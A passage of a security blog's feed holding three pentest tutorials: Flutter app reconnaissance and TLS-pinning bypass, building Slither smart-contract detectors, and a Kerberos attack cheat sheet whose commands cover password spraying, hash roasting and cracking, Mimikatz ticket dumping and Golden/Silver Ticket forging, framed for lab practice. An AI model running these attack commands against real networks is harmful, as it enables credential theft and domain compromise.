Flutter uses platform channels (e.g., `MethodChannel`, `EventChannel`) to communicate between Dart and the native Android or iOS layer. These channels are critical when you want to hook authentication, storage, or cryptographic operations, as Dart often delegates those to native code.

#### Snapshots in Debug and Profile Builds

In `debug` or `profile` builds, `libapp.so` might not be present. Instead, the app runs using Dart snapshot files that are interpreted at runtime:

-   `kernel_blob.bin`
-   `isolate_snapshot_data`
-   `vm_snapshot_data`

These files can still expose class names, symbols, and logic structure. However, you’ll need specific tools or scripts to extract anything meaningful from them.
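Even without a snapshot parser, a quick `strings`-style pass over these files often surfaces class names and endpoints. A minimal sketch (the snapshot path in the comment is a placeholder):

```python
import re

def extract_strings(data: bytes, min_len: int = 6):
    # Pull out runs of printable ASCII, the same idea as the `strings` utility
    return [m.group().decode() for m in re.finditer(rb"[ -~]{%d,}" % min_len, data)]

# Against a real app you would read the snapshot from the unpacked APK, e.g.:
#   blob = open("assets/flutter_assets/kernel_blob.bin", "rb").read()
blob = b"\x00\x01MyAuthService\xffhttps://api.example.com/login\x02"
print(extract_strings(blob))
```

Grepping that output for `http`, `api`, or company-specific keywords is a cheap way to map an app&apos;s backend surface before any dynamic work.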

## Recon Techniques for Flutter Apps

Before jumping into traffic interception, it’s often a good idea to understand the app’s structure, logic, and surface area. Flutter apps complicate this due to their native compilation, but there are still effective techniques you can use to break them open.

#### Full APK Decompilation with apkx

[`apkx`](https://github.com/rednaga/apkx) automates the extraction of all APK internals, including DEX, resources, native libs, and converts the DEX to JAR for easy navigation. Great starting point to explore native libraries and any embedded Java/Kotlin logic.

```bash
apkx target.apk

```

#### Static Analysis with MobSF

[MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF) gives you a fast overview of the app: permissions, activities, trackers, exposed components, and network endpoints. Even with Flutter, this helps uncover basic misconfigurations or embedded secrets.

#### Native Reversing with Ghidra

Flutter’s Dart code is usually compiled into `libapp.so`, which holds the AOT-compiled logic of the app. Tools like `jadx` won’t help much here. Instead, load the native library into Ghidra to reverse engineer low-level logic, look for method names, strings, and identify Flutter plugins or obfuscated behavior.

#### Dart Snapshot Inspection

Sometimes you’ll find files like `kernel_blob.bin`, `isolate_snapshot_data`, or `vm_snapshot_data` inside the APK. These contain compiled Dart bytecode. With custom tools or scripts, you can try to extract readable Dart symbols or identify class/function names.

#### Manual Recon with jadx

While most business logic is in Dart, many Flutter apps still include Java-based plugins (e.g. for network or crypto). `jadx` is useful for inspecting those native interfaces, especially when combined with Frida hooks later on.

## How to Intercept Traffic from Non-Proxy Aware Flutter Apps

So, you install the Flutter app you want to test, set up your proxy, route your device’s traffic through your Kali box... and nothing. No requests in Burp, no useful logs. What’s going on?

**The issue?**  
Flutter apps are often **non-proxy aware**, meaning they completely ignore your system proxy settings.

I plan to write a dedicated article on this soon, but here’s a quick overview of how to handle it:

#### Set up an OpenVPN server

This allows you to tunnel all traffic from the target device through a VPN that redirects requests to your Burp proxy.

#### Create a controlled Wi-Fi access point

Use a device like a Kali box or Raspberry Pi to host a rogue access point. Then configure `iptables` or `redir` to transparently forward traffic to your proxy.

Once you have traffic properly routed, you’ll most likely encounter **TLS pinning**. That’s where Frida becomes essential.

#### Use this Frida script to disable Flutter’s TLS verification

**NVISO’s Flutter TLS Bypass**  
GitHub: [https://github.com/NVISOsecurity/disable-flutter-tls-verification](https://github.com/NVISOsecurity/disable-flutter-tls-verification)

This script often works out of the box and patches the Flutter engine to disable certificate validation. However, in my experience, it tends to work more reliably on iOS than on Android. Your mileage may vary depending on the Flutter version and the target device.

#### Custom plugins may require extra work

Sometimes the app uses a plugin that handles its own TLS logic. In those cases, the generic Frida patch won’t be enough. Use tools like `jadx` to explore the code and locate certificate pinning implementations.

One plugin I’ve run into frequently is:  
[https://github.com/diefferson/http\_certificate\_pinning](https://github.com/diefferson/http_certificate_pinning)

To bypass it, you can try a Frida script like this one:  
[https://codeshare.frida.re/@incogbyte/android-mix-sslunpin-bypass/](https://codeshare.frida.re/@incogbyte/android-mix-sslunpin-bypass/)

**Important:** the class name used in the original repo is now `diefferson.http_certificate_pinning.HttpCertificatePinningPlugin`.  
Most public Frida bypasses still reference the old class name `HttpCertificatePinning`, so if the script fails, check for that.

#### Optional: Try ReFlutter for Dart snapshot extraction

You can also try [ReFlutter](https://github.com/ptswarm/reflutter) to extract and reconstruct Dart snapshot files like `isolate_snapshot_data` or `kernel_blob.bin`.  
It attempts to rebuild the original Dart code into a readable form.

That said, I haven’t had much luck getting useful output from it in practice, especially with recent versions of Flutter. Still, it’s worth trying in case you get lucky.

## Final Thoughts

That’s it for this post. Flutter may look different on the surface, but with the right tools and mindset, it becomes just another platform you can analyze and break effectively.

As I mentioned last week, the blog post for this week is focused on **Slither’s API**. It covers how to use it to create custom detectors and analyze smart contracts in depth.  
You can check it out here: [**Slither API Deep Dive**](https://www.kayssel.com/post/web3-18/)**.**

Let me know what you&apos;d like to see next, especially if you&apos;re into mobile or smart contract hacking.

# References

For setting up traffic interception with Burp and OpenVPN, check out this detailed guide:  
[Intercepting HTTP Traffic with OpenVPN on Android – InfoSec Writeups](https://infosecwriteups.com/intercepting-http-traffic-with-openvpn-on-android-5835fa40466d)

The OWASP Mobile Security Testing Guide also covers this technique here:  
[OWASP MASTG – MASTG-TECH-0109](https://mas.owasp.org/MASTG/techniques/android/MASTG-TECH-0109/)</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>Beyond the CLI: Hacking Smart Contracts with the Slither API</title><link>https://www.kayssel.com/post/web3-18</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-18</guid><description>Discover the power of Slither&apos;s API for in-depth smart contract auditing. Learn how to build custom detectors, enhance output with Rich, and uncover hidden vulnerabilities beyond standard static analysis.</description><pubDate>Sun, 04 May 2025 08:52:40 GMT</pubDate><content:encoded># Introduction

In the previous chapter of this Web3 hacking series, I introduced one of the most widely used tools: **Slither**.  
Today, we&apos;re diving deeper by exploring its API. This API is extremely powerful and allows us to build custom tools to detect vulnerabilities in Ethereum smart contracts.

However, there’s one small catch: **the documentation isn’t great.** Especially when it comes to examples. Because of that, I had to spend some time not only reading the official docs but also digging into Slither’s GitHub repository to better understand how to use it.

With that said, let&apos;s dive into this little research project!

# Basic Recon

To interact with Slither&apos;s API more easily, we&apos;ll be using **IPython3**.  
Since the documentation is limited, IPython’s introspection capabilities make it much quicker to explore available functions and attributes on the fly.

Our first task will be to **enumerate the contracts** detected in a project.  
I’ll be using the [contracts we developed](https://www.kayssel.com/post/web3-17/) a few weeks ago for this demonstration.  
The syntax is pretty self-explanatory, so I’ll focus on commenting on the parts that I think will be most useful. 😄

Here&apos;s how to get started:

```python
from slither.slither import Slither

slither = Slither(&apos;.&apos;)  # Load Slither in the current directory

for contract in slither.contracts:
    print(contract.name)


```

&lt;details&gt;
&lt;summary&gt;Output:&lt;/summary&gt;

```python
console
GrimoireOfEchoes
OracleOfWhispers

```
&lt;/details&gt;


Behind the scenes, Slither builds a full object model of your Solidity code.  
This is important to understand as we go forward, especially when building custom tools or detectors.

Here’s what you&apos;re working with under the hood:

-   `slither.contracts`: a list of all smart contracts found in the project. Each one is a `Contract` object.
-   `contract.functions`: all functions inside a contract including public, internal, and constructors.
-   `contract.state_variables`: lets you inspect the contract’s storage layout.
-   `function.nodes`: each function is broken down into control-flow blocks.
-   `node.irs`: every node contains IR (intermediate representation) instructions. This is where things like low-level calls, assignments, and expressions live.

As you explore the API, you&apos;ll mostly be traversing this structure, jumping from contracts to functions, then diving into nodes and instructions when needed.

Let’s now try inspecting some of these pieces, starting with listing the functions of a specific contract.

## Exploring Functions and Variables

We can **list all the functions** in a specific contract like this:

```python
for contract in slither.contracts:
    if contract.name == &quot;GrimoireOfEchoes&quot;:
        for function in contract.functions:
            print(function.name)

```

&lt;details&gt;
&lt;summary&gt;Output:&lt;/summary&gt;

```python
constructor
channelMana
notUsed
releaseEssence
amplifySpirits
invokeOracle

```
&lt;/details&gt;


Similarly, we can **enumerate state variables**:

```python
for contract in slither.contracts:
    if contract.name == &quot;GrimoireOfEchoes&quot;:
        for var in contract.state_variables:
            print(var.name)

```

&lt;details&gt;
&lt;summary&gt;Output:&lt;/summary&gt;

```python
manaReservoir
corruptionIndex
forbiddenTithe
oracle

```
&lt;/details&gt;


## Finding Unused Variables

Using Slither’s API, we can check which variables are being **read** or **written** inside the contract:

```python
contract = slither.contracts[0]

for var in contract.state_variables:
    print(f&quot;Variable: {var.name}&quot;)
    readers = contract.get_functions_reading_from_variable(var)
    writers = contract.get_functions_writing_to_variable(var)
    print(f&quot;Writers: {len(writers)}&quot;)
    print(f&quot;Readers: {len(readers)}\n&quot;)

```

&lt;details&gt;
&lt;summary&gt;Output:&lt;/summary&gt;

```python
Variable: manaReservoir
Writers: 3
Readers: 3

Variable: corruptionIndex
Writers: 1
Readers: 1

Variable: forbiddenTithe
Writers: 1
Readers: 0

Variable: oracle
Writers: 1
Readers: 1
```
&lt;/details&gt;


This is super useful for spotting **unused variables**, which you can later report as informational findings.
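If you want to triage those counts automatically, a tiny pure-Python classifier does the job. The rule below is my own illustrative heuristic, not a Slither built-in:

```python
def classify_state_variable(n_readers: int, n_writers: int) -> str:
    # Illustrative triage rule: never touched -> dead code;
    # written but never read -> wasted storage (and gas) worth reporting
    if n_readers == 0 and n_writers == 0:
        return "unused"
    if n_readers == 0:
        return "written but never read"
    return "in use"

# With Slither objects: classify_state_variable(len(readers), len(writers))
print(classify_state_variable(0, 1))  # forbiddenTithe from the output above
```

In the run above, `forbiddenTithe` is the one that would be flagged: one writer, zero readers.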

## Checking Function Documentation

&lt;details&gt;
&lt;summary&gt;Another useful thing is to verify which functions are documented:&lt;/summary&gt;

```python
for function in contract.functions:
    print(f&quot;Function {function.name} is documented? {function.has_documentation}&quot;)

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Output:&lt;/summary&gt;

```python
Function constructor is documented? False
Function channelMana is documented? False
Function notUsed is documented? False
Function releaseEssence is documented? True
Function amplifySpirits is documented? False
Function invokeOracle is documented? False

```
&lt;/details&gt;


Functions that lack proper documentation (especially **NatSpec**) can also be flagged as informational issues for clients.

## Listing Function Parameters

You might also want to inspect **function parameters**:

```python
for function in contract.functions:
    print(f&quot;Function {function.name}&quot;)
    if function.parameters:
        print(f&quot;Parameters: {&apos;, &apos;.join(str(p) for p in function.parameters)}\n&quot;)
    else:
        print(&quot;No parameters\n&quot;)

```

&lt;details&gt;
&lt;summary&gt;Output:&lt;/summary&gt;

```python
Function constructor
Parameters: _oracle

Function channelMana
No parameters

Function notUsed
No parameters

Function releaseEssence
No parameters

Function amplifySpirits
Parameters: spirits

Function invokeOracle
No parameters

```
&lt;/details&gt;


## Finding Dead Internal Functions

Here&apos;s a small script I built to find **internal or private functions** that are **never called**:

```python
def get_dead_internal_functions(slither, contract_names=None):
    dead_functions = set()

    for contract in slither.contracts:
        if contract_names and contract.name not in contract_names:
            continue

        internal_functions = {
            f.name for f in contract.functions if f.visibility in [&quot;internal&quot;, &quot;private&quot;]
        }
        used_internal_functions = set()

        for entry_point in contract.functions:
            if entry_point.visibility in [&quot;public&quot;, &quot;external&quot;]:
                for call in entry_point.all_internal_calls():
                    if hasattr(call, &quot;function&quot;) and hasattr(call.function, &quot;name&quot;):
                        used_internal_functions.add(call.function.name)

        dead_functions.update(internal_functions - used_internal_functions)

    return dead_functions


```

&lt;details&gt;
&lt;summary&gt;Usage:&lt;/summary&gt;

```python
slither = Slither(&apos;.&apos;)
print(get_dead_internal_functions(slither, [&quot;GrimoireOfEchoes&quot;]))

```
&lt;/details&gt;


## Improving Output with Rich

Raw output from Slither can be quite rough.  
Luckily, we can greatly improve it by using the Python library **Rich** to create clean tables:

```python
from rich.console import Console
from rich.table import Table

def list_contracts_and_files(slither):
    console = Console()
    table = Table(title=&quot;Contracts and Source Files&quot;, show_lines=True)
    table.add_column(&quot;Contract Name&quot;, style=&quot;bold cyan&quot;)
    table.add_column(&quot;File Path&quot;, style=&quot;magenta&quot;)

    for contract in slither.contracts:
        filename = str(contract.source_mapping.filename.short)
        table.add_row(contract.name, filename)

    console.print(table)

```

![](/content/images/2025/04/image-9.png)

Rich output

# Building a Custom Detector

Before jumping into the code, let’s take a moment to understand what a custom detector really is in Slither.

At its core, a detector is just a Python class that inspects the internal structure Slither builds when parsing your Solidity code. The cool part is that you don’t need to hack anything into Slither itself. The API gives you everything you need to analyze contracts, functions, variables, and even control flow.

Here’s what’s essential to know before writing one:

-   You’ll subclass `AbstractDetector`, the base class for all Slither detectors.
-   The core logic goes inside a method called `_detect()`, which Slither automatically runs.
-   From there, you’ll iterate over `slither.contracts`, access `contract.functions`, and dive into control flow or IR when needed.
-   To report an issue, you call `self.generate_result(...)` with the details you want to display.

So in short: you&apos;re just walking Slither’s internal object model, which we’ve already explored, and describing what to flag.

&lt;details&gt;
&lt;summary&gt;An example of a custom detector is the following:&lt;/summary&gt;

```python
from slither.detectors.abstract_detector import AbstractDetector, DetectorClassification
from slither.core.declarations import Function

class UnusedInternalFunctionDetector(AbstractDetector):
    ARGUMENT = &quot;unused-internal&quot;
    HELP = &quot;Detects internal/private functions that are never used&quot;
    IMPACT = DetectorClassification.LOW
    CONFIDENCE = DetectorClassification.HIGH

    WIKI = &quot;x&quot;

    WIKI_TITLE = &quot;Unused internal or private functions&quot;
    WIKI_DESCRIPTION = &quot;Detects internal or private functions that are never used by any public or external functions in the contract.&quot;
    WIKI_EXPLOIT_SCENARIO = (
        &quot;A contract has several internal functions written for reuse, &quot;
        &quot;but they are never actually called. This unnecessarily bloats the bytecode &quot;
        &quot;and may confuse future developers.&quot;
    )
    WIKI_RECOMMENDATION = (
        &quot;Remove unused internal or private functions to simplify the contract and reduce bytecode size.&quot;
    )

    def _detect(self):
        results = []

        for contract in self.slither.contracts:
            internal_funcs = {
                f.name: f
                for f in contract.functions
                if f.visibility in [&quot;internal&quot;, &quot;private&quot;]
            }

            used_funcs = {
                call.function.name
                for f in contract.functions
                if f.visibility in [&quot;public&quot;, &quot;external&quot;]
                for call in f.all_internal_calls()
                if hasattr(call, &quot;function&quot;) and hasattr(call.function, &quot;name&quot;)
            }

            for name, func in internal_funcs.items():
                if name not in used_funcs:
                    info = [f&quot;Unused internal function `{name}` in contract `{contract.name}`&quot;]
                    results.append(self.generate_result(info, func))

        return results

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;You can register and run the detector like this:&lt;/summary&gt;

```python
from detectors.custom_detector import UnusedInternalFunctionDetector
from slither.slither import Slither

slither = Slither(&apos;.&apos;)
slither.register_detector(UnusedInternalFunctionDetector)
slither.run_detectors()

```
&lt;/details&gt;


## Improving Slither CLI Output

If you want even cleaner output for all Slither’s built-in detectors, you can dynamically register all detectors and print findings in a table.

&lt;details&gt;
&lt;summary&gt;Example:&lt;/summary&gt;

```python
import importlib
import inspect
from slither.slither import Slither
from slither.detectors import all_detectors
from slither.detectors.abstract_detector import AbstractDetector
from rich.console import Console
from rich.table import Table

console = Console()
slither = Slither(&quot;.&quot;)

for name in dir(all_detectors):
    obj = getattr(all_detectors, name)
    if inspect.isclass(obj) and issubclass(obj, AbstractDetector) and obj is not AbstractDetector:
        slither.register_detector(obj)

results = slither.run_detectors()

if results:
    table = Table(title=&quot;🔎 Slither Analysis Results&quot;, show_lines=True)
    table.add_column(&quot;Check&quot;, style=&quot;bold magenta&quot;)
    table.add_column(&quot;Impact&quot;, style=&quot;bold yellow&quot;)
    table.add_column(&quot;Confidence&quot;, style=&quot;green&quot;)
    table.add_column(&quot;Description&quot;, style=&quot;&quot;)

    for group in results:
        for issue in group:
            table.add_row(
                issue.get(&quot;check&quot;, &quot;N/A&quot;),
                issue.get(&quot;impact&quot;, &quot;N/A&quot;),
                issue.get(&quot;confidence&quot;, &quot;N/A&quot;),
                issue.get(&quot;description&quot;, &quot;No description&quot;)
            )
    console.print(table)
else:
    console.print(&quot;[bold green]✅ No issues found!&quot;)

```
&lt;/details&gt;


![](/content/images/2025/04/image-10.png)

Improving the default output of Slither

# Building a More Complex Detector: Gas Griefing

Gas griefing is a subtle but dangerous vulnerability pattern in Solidity smart contracts. It happens when a function performs a **low-level external call** (like `.call()`) and then updates the contract’s state **only if the call succeeds**.  
This can be exploited by an attacker who forces the external call to **fail repeatedly**, for example by consuming too much gas or triggering a revert. As a result, the state-changing logic never runs, potentially locking funds or disrupting the contract’s behavior.

Since this type of pattern isn’t detected by default in Slither, writing a custom detector is a great way to identify it across large codebases.

Here’s what this custom detector does:

-   It goes through all **public and external functions** in the codebase.
-   It searches for **low-level calls**, using Slither’s intermediate representation (`LowLevelCall`).
-   Then it checks whether there are **state changes that only occur if the call succeeds**, which is a red flag.
-   If that conditional logic is found, the detector raises a finding with the relevant details.

To build this, we rely more heavily on Slither’s IR and control flow structures, especially the `nodes` inside each function and the IR instructions (`irs`) they contain. But the logic still follows the same pattern you’ve seen before: loop through contracts and functions, analyze what’s happening, and collect the results.
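Before reading the full detector, the node/IR traversal it relies on can be sketched with stand-in objects. All class and variable names here are hypothetical, purely to show the shape of the loop; a real detector walks Slither’s own node and IR instances instead:

```python
from dataclasses import dataclass, field

# Hypothetical stand-ins for Slither's IR operation and CFG node
@dataclass
class LowLevelCall:
    destination: str

@dataclass
class Node:
    irs: list = field(default_factory=list)

def find_low_level_calls(nodes):
    # Same traversal shape as the detector: every node, then every IR op in it
    return [ir for node in nodes for ir in node.irs if isinstance(ir, LowLevelCall)]

nodes = [Node(irs=["x = 1"]), Node(irs=[LowLevelCall("recipient.call()")])]
print(len(find_low_level_calls(nodes)))  # -> 1
```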

Let’s look at the code.

```python
from typing import List

from slither.detectors.abstract_detector import AbstractDetector, DetectorClassification
from slither.utils.output import Output
from slither.core.declarations import Function
from slither.slithir.operations.low_level_call import LowLevelCall


class GasGriefingDetector(AbstractDetector):
    ARGUMENT = &quot;gas-griefing&quot;
    HELP = &quot;Detect gas griefing vulnerabilities due to conditional state logic after low-level calls&quot;
    IMPACT = DetectorClassification.MEDIUM
    CONFIDENCE = DetectorClassification.MEDIUM

    WIKI = &quot;https://example.com/wiki/gas-griefing&quot;
    WIKI_TITLE = &quot;Gas Griefing&quot;
    WIKI_DESCRIPTION = (
        &quot;Detects functions that modify state after a low-level call only if the call succeeded, &quot;
        &quot;which could allow griefing attacks if the external call consistently fails.&quot;
    )
    WIKI_EXPLOIT_SCENARIO = (
        &quot;An attacker interacts with a function that increases a counter before calling an external oracle. &quot;
        &quot;If the call fails, the counter is never decremented, eventually corrupting state.&quot;
    )
    WIKI_RECOMMENDATION = (
        &quot;Ensure external calls do not conditionally affect state in a way that could be abused &quot;
        &quot;by repeated failure or reverting of the external call.&quot;
    )


    def _detect(self) -&gt; List[Output]:
        results = []

        for contract in self.contracts:
            for function in contract.functions_and_modifiers_declared:

                if function.is_implemented and function.visibility in {&quot;public&quot;, &quot;external&quot;}:

                    low_level_calls = self._find_low_level_calls(function)
                    if low_level_calls and self._has_conditional_state_write(function):
                        info = [
                            f&quot;Function &apos;{function.full_name}&apos; in contract &apos;{contract.name}&apos; may be vulnerable to gas griefing.\n&quot;,
                            &quot;Detected low-level call(s) followed by conditional state modification.\n&quot;
                        ]

                        code_snippet = None
                        for call in low_level_calls:
                            src_map = call.node.source_mapping

                            if src_map and src_map.lines:
                                filename = src_map.filename.short
                                line_number = src_map.lines[0]
                                code_snippet = function.nodes[0].source_mapping.content
                                info.append(f&quot;  ↪ Low-level call at {filename}:{line_number}\n&quot;)
                            else:
                                info.append(&quot;  ↪ Low-level call at unknown location\n&quot;)

                        # Build the result for Slither
                        res = self.generate_result(info)
                        res.add(function)
                        if code_snippet:
                            params = &quot;, &quot;.join(str(p) for p in function.parameters)
                            header = f&quot;function {function.name}({params}) {function.visibility}&quot;
                            for call in low_level_calls:
                                res.add(call.node, {&quot;type&quot;: &quot;low_level_call&quot;, &quot;code&quot;: f&quot;{header}\n{code_snippet.strip()}\n&quot;})
                        results.append(res)
        return results

    def _find_low_level_calls(self, function: Function) -&gt; List[LowLevelCall]:
        calls = []
        for node in function.nodes:
            for ir in node.irs:
                if isinstance(ir, LowLevelCall):
                    calls.append(ir)
        return calls

    def _has_conditional_state_write(self, function: Function) -&gt; bool:
        &quot;&quot;&quot;
        Checks if any node inside a conditional block modifies state
        &quot;&quot;&quot;
        for node in function.nodes:
            if node.son_true or node.son_false:  # This node is an if/else branch point
                for branch in (node.son_true, node.son_false):
                    if branch is not None and branch.state_variables_written:
                        return True
        return False



```

After creating the detector, we first need to **load** it into Slither, and then we can use a simple script to **run the detectors** and **print a clean table** with the results using **Rich**.

```python
def run_custom_detectors(slither, min_impact=None, min_confidence=None):
    from rich.console import Console
    from rich.table import Table
    from rich.panel import Panel

    console = Console()

    results = slither.run_detectors()

    # Set priority levels
    levels = {&quot;low&quot;: 1, &quot;medium&quot;: 2, &quot;high&quot;: 3}
    impact_threshold = levels.get(min_impact, 0)
    confidence_threshold = levels.get(min_confidence, 0)

    def is_valid(issue):
        impact = levels.get(issue.get(&quot;impact&quot;, &quot;&quot;).lower(), 0)
        confidence = levels.get(issue.get(&quot;confidence&quot;, &quot;&quot;).lower(), 0)
        return impact &gt;= impact_threshold and confidence &gt;= confidence_threshold

    filtered_results = [
        [issue for issue in group if is_valid(issue)] for group in results
    ]
    filtered_results = [group for group in filtered_results if group]

    if filtered_results:
        table = Table(title=&quot;Custom Detector Results&quot;, show_lines=True)
        table.add_column(&quot;Check&quot;, style=&quot;bold magenta&quot;)
        table.add_column(&quot;Impact&quot;, style=&quot;bold yellow&quot;)
        table.add_column(&quot;Confidence&quot;, style=&quot;green&quot;)
        table.add_column(&quot;Description&quot;, style=&quot;&quot;)

        for group in filtered_results:
            for issue in group:
                table.add_row(
                    issue.get(&quot;check&quot;, &quot;N/A&quot;),
                    issue.get(&quot;impact&quot;, &quot;N/A&quot;),
                    issue.get(&quot;confidence&quot;, &quot;N/A&quot;),
                    issue.get(&quot;description&quot;, &quot;No description&quot;),
                )
        console.print(table)
    else:
        console.print(Panel(&quot;[bold green]✅ No issues found by custom detectors!&quot;, title=&quot;All Clear&quot;))

```

Then, you can run the following script to display the findings nicely:

```python
from slither.slither import Slither
from detectors.custom_detector import GasGriefingDetector

slither = Slither(&apos;.&apos;)
slither.register_detector(GasGriefingDetector)
run_custom_detectors(slither)

```

![](/content/images/2025/04/image-14.png)

Custom detector output

If we want an even better report, we can use **Rich’s syntax highlighting** to display the actual Solidity code of the vulnerable function directly in the terminal.

This works especially well if your **custom detector includes additional fields** in its results. For example, a snippet of the code where the issue occurs.  
When calling `generate_result(...)`, you can attach custom data (like the Solidity source) using the `additional_fields` argument. This way, your reporting function can extract that information and render it beautifully with Rich.

Here’s the improved version of the reporting function that takes advantage of this feature:

```python
def run_custom_detectors(slither, min_impact=None, min_confidence=None):
    from rich.console import Console
    from rich.panel import Panel
    from rich.syntax import Syntax
    from rich.rule import Rule
    console = Console()

    results = slither.run_detectors()

    # Set priority levels
    levels = {&quot;low&quot;: 1, &quot;medium&quot;: 2, &quot;high&quot;: 3}
    impact_threshold = levels.get(min_impact, 0)
    confidence_threshold = levels.get(min_confidence, 0)

    def is_valid(issue):
        impact = levels.get(issue.get(&quot;impact&quot;, &quot;&quot;).lower(), 0)
        confidence = levels.get(issue.get(&quot;confidence&quot;, &quot;&quot;).lower(), 0)
        return impact &gt;= impact_threshold and confidence &gt;= confidence_threshold

    filtered_results = [
        [issue for issue in group if is_valid(issue)] for group in results
    ]
    filtered_results = [group for group in filtered_results if group]

    if filtered_results:
        console.print(Rule(&quot;Custom Detector Report&quot;))

        for group in filtered_results:
            for issue in group:
                console.print(f&quot;[bold magenta]Check:[/] {issue.get(&apos;check&apos;, &apos;N/A&apos;)}&quot;)
                console.print(f&quot;[bold yellow]Impact:[/] {issue.get(&apos;impact&apos;, &apos;N/A&apos;)}&quot;)
                console.print(f&quot;[bold green]Confidence:[/] {issue.get(&apos;confidence&apos;, &apos;N/A&apos;)}&quot;)
                console.print(f&quot;[bold]Description:[/] {issue.get(&apos;description&apos;, &apos;No description&apos;)}&quot;)
                
                # Search for &apos;code&apos; in additional_fields
                elements = issue.get(&apos;elements&apos;, [])
                code_snippet = None
                for element in elements:
                    additional = element.get(&apos;additional_fields&apos;, {})
                    code_snippet = additional.get(&apos;code&apos;)
                    if code_snippet:
                        break
                if code_snippet:
                    console.print(&quot;\n[bold cyan]Code Snippet:[/]\n&quot;)
                    syntax = Syntax(code_snippet, &quot;solidity&quot;, line_numbers=True, theme=&quot;dracula&quot;)
                    console.print(syntax)
                
                console.print(Rule(style=&quot;dim&quot;))

    else:
        console.print(Panel(&quot;[bold green]✅ No issues found by custom detectors!&quot;, title=&quot;All Clear&quot;))

```

![](/content/images/2025/04/image-13.png)

Code Highlight

# Conclusions

In this chapter, we explored several ways to use Slither’s API, from **basic recon** to **building custom detectors**.  
We also learned how to **enhance Slither&apos;s output** using Python’s **Rich** library.

There&apos;s so much potential with Slither’s API. I encourage you to experiment and see what cool tools you can build!  
See you in the next chapter.

# References

Trail of Bits. &quot;Slither API Documentation: Python Interface for Static Analysis.&quot; Available at: [https://crytic.github.io/slither/](https://crytic.github.io/slither/slither.html)</content:encoded><author>Ruben Santos</author></item><item><title>Kerberos Tactics Every Pentester Should Know</title><link>https://www.kayssel.com/newsletter/issue-2</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-2</guid><description>A hands-on guide to the most effective Kerberos attacks in Active Directory environments</description><pubDate>Sun, 27 Apr 2025 08:43:14 GMT</pubDate><content:encoded>Hey everyone!  
Hope you&apos;re doing great.

Last week, I dropped some quick tips for hacking GraphQL APIs.  
This time, we’re jumping into Active Directory: specifically, the must-know Kerberos attacks every pentester should have in their toolkit.

Also, quick note: I’m working on a deep dive into using Slither’s API for smart contract analysis. It’s taking a bit longer than expected, but it’ll be worth it!

Now, let&apos;s get into it:

# Kerberos Attacks Every Pentester Should Know

If you’re digging into Active Directory environments, understanding how to attack Kerberos is essential. At the end of the day, Kerberos is just the authentication protocol used by Active Directory, and several of its steps can actually be exploited. If you want to dive deeper into how it all works, I’ve linked a more [detailed article here.](https://www.kayssel.com/post/kerberos/)

![](https://substackcdn.com/image/fetch/w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e760903-e24e-448d-9e8c-70621ddd88fd_996x678.png)

This post lays out the most important Kerberos attack techniques you need to have in your toolkit, along with commands you can try directly in your lab.

## Brute-Forcing and User Enumeration with Kerberos

One of the first things you want to do in a domain is find valid users. Kerberos helps with that, thanks to how it handles authentication errors.

Tools like `Kerbrute` make it easy to enumerate usernames without triggering account lockouts. You can also try password spraying or check if users are using their username as their password.

### Example usage:

```bash
kerbrute userenum --dc 10.10.10.10 -d domain.local usernames.txt
```

```bash
kerbrute passwordspray --dc 10.10.10.10 -d domain.local usernames.txt password123
```

[Kerbrute on GitHub](https://github.com/ropnop/kerbrute)

## AS-REP Roasting (ASREProast)

Some users are configured without pre-authentication. When that&apos;s the case, you can request authentication data encrypted with their NT hash and crack it offline.

### Example usage:

```bash
GetNPUsers.py domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.10
```

&lt;details&gt;
&lt;summary&gt;Then crack it:&lt;/summary&gt;

```bash
hashcat -m 18200 hashes.txt rockyou.txt
```
&lt;/details&gt;


## Kerberoasting

If you have valid domain creds, you can request service tickets for SPN accounts. These are encrypted with the account&apos;s NT hash. Once you extract the ticket, crack it to get the password.

### Example usage:

```bash
GetUserSPNs.py domain.local/username:password -dc-ip 10.10.10.10 -request
```

&lt;details&gt;
&lt;summary&gt;Crack the hash:&lt;/summary&gt;

```bash
hashcat -m 13100 hash.txt rockyou.txt
```
&lt;/details&gt;


## Over Pass-the-Hash (Pass-the-Key)

If you have the user&apos;s NT hash, you don’t need their password to authenticate and request a TGT. This lets you impersonate users and move laterally.

### Example usage:

```bash
getTGT.py -hashes :&lt;NT_HASH&gt; domain.local/username
export KRB5CCNAME=username.ccache
```

Use that ticket with any Kerberos-aware tool.

## Pass-the-Ticket

Dump valid Kerberos tickets from memory and reuse them across the network. You’ll need to convert formats and set the correct environment variable.

### Mimikatz:

```mimikatz
privilege::debug
sekurlsa::tickets /export
```

### Convert ticket:

```bash
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
```

&lt;details&gt;
&lt;summary&gt;Then run:&lt;/summary&gt;

```bash
psexec.py -k -no-pass domain.local/user@10.10.10.10
```
&lt;/details&gt;


## Golden Tickets

Golden Tickets let you generate valid TGTs for any user in the domain. All you need is the krbtgt account’s NT hash and the domain SID.

### Example usage:

```bash
ticketer.py -nthash &lt;krbtgt_hash&gt; -domain-sid S-1-5-21-XXXX -domain domain.local username
```

## Silver Tickets

Silver Tickets work like Golden Tickets but are scoped to specific services. You only need the hash of the service account, not krbtgt.

### Example usage:

```bash
ticketer.py -nthash &lt;svc_hash&gt; -domain domain.local -spn HTTP/web.domain.local -user user1
```

## Practice Environment

If you want to put these techniques into action, here are some recommended places to train:

### 🟢 **Beginner-Friendly**

-   [**Sauna**](https://www.hackthebox.com/machines/sauna)  
    A great starting point to get comfortable with Kerberos basics. You&apos;ll get to try user enumeration and explore ticket-based attacks.
-   [**Active**](https://www.hackthebox.com/machines/active)  
    Classic intro to AD misconfigurations. Expect to deal with password policy issues and simple Kerberos abuse techniques.
-   [**Forest**](https://www.hackthebox.com/machines/forest)  
    A must-try for anyone learning AD. You’ll get to play with Kerberoasting and domain privilege escalation paths.

* * *

### 🟡 **Intermediate**

-   [**Office**](https://www.hackthebox.com/machines/office)  
